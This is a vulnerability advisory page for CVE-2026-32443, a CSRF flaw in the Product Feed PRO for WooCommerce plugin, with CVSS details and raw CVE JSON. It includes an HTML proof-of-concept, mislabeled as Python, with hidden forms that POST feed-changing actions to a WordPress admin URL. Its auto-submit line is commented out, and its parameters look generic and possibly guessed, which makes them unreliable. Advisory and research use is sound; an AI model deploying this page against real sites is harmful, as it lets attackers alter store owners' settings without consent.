Security Vulnerability Report
中文
CVE-2026-32443 CVSS 6.5 MEDIUM

CVE-2026-32443

Published: 2026-03-13 19:55:05
Last Modified: 2026-04-22 21:30:26

Description

Cross-Site Request Forgery (CSRF) vulnerability in Josh Kohlbach Product Feed PRO for WooCommerce woo-product-feed-pro allows Cross Site Request Forgery.This issue affects Product Feed PRO for WooCommerce: from n/a through <= 13.5.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Product Feed PRO for WooCommerce <= 13.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-32443 --> <!-- Target: Product Feed PRO for WooCommerce plugin --> <!-- This PoC demonstrates a CSRF attack that modifies feed settings --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2026-32443</title> </head> <body> <h1>CSRF Attack PoC</h1> <p>This page demonstrates the CSRF vulnerability in Product Feed PRO for WooCommerce.</p> <!-- Form to modify feed settings --> <form action="http://target-site/wp-admin/admin.php?page=woo-product-feed-pro/woo-product-feed-pro.php" method="POST" id="csrfForm"> <input type="hidden" name="feed_name" value="malicious_feed"> <input type="hidden" name="feed_format" value="google"> <input type="hidden" name="action" value="save_feed"> <input type="hidden" name="nonce" value=""> </form> <!-- Form to trigger feed generation --> <form action="http://target-site/wp-admin/admin.php?page=woo-product-feed-pro" method="POST" id="generateForm"> <input type="hidden" name="feed_id" value="1"> <input type="hidden" name="action" value="generate_feed"> <input type="hidden" name="_wpnonce" value=""> </form> <script> // Auto-submit forms when page loads window.onload = function() { // Uncomment to auto-execute attack // document.getElementById('csrfForm').submit(); console.log('CSRF forms ready - auto-submit commented out for safety'); }; </script> <p><strong>Note:</strong> In a real attack, the attacker would host this page and trick the admin into visiting it while logged in.</p> <p>The forms would automatically submit, exploiting the lack of CSRF protection.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32443", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:04.880", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Josh Kohlbach Product Feed PRO for WooCommerce woo-product-feed-pro allows Cross Site Request Forgery.This issue affects Product Feed PRO for WooCommerce: from n/a through <= 13.5.2."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Josh Kohlbach Product Feed PRO para WooCommerce woo-product-feed-pro permite la falsificación de petición en sitios cruzados. Este problema afecta a Product Feed PRO para WooCommerce: desde n/a hasta &lt;= 13.5.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-product-feed-pro/vulnerability/wordpress-product-feed-pro-for-woocommerce-plugin-13-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}